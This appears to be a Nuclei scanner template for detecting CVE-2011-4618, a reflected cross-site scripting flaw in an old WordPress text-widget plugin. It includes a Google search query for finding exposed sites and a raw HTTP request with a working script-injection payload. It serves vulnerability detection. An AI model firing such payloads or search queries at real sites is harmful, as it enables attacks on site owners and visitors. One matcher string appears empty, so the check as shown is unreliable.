id: CVE-2011-4618 info: name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/ - http://www.openwall.com/lists/oss-security/2011/12/19/6 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.00746 epss-percentile: 0.7882 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: simplerealtytheme product: advanced_text_widget_plugin google-query: inurl:"/wp-content/plugins/advanced-text-widget" tags: cve,cve2011,wordpress,xss,wp-plugin http: - raw: - | GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and # digest: 4a0a00473045022100b88a5afe883f1e1e7ee4f934b30137675e339dbec03248c874bcc40972c92e24022032a8617097ff2fd05c6c149a83af68a1f3172480ba0515b6399eba8da84c4136:922c64590222798bb761d5b6d8e72950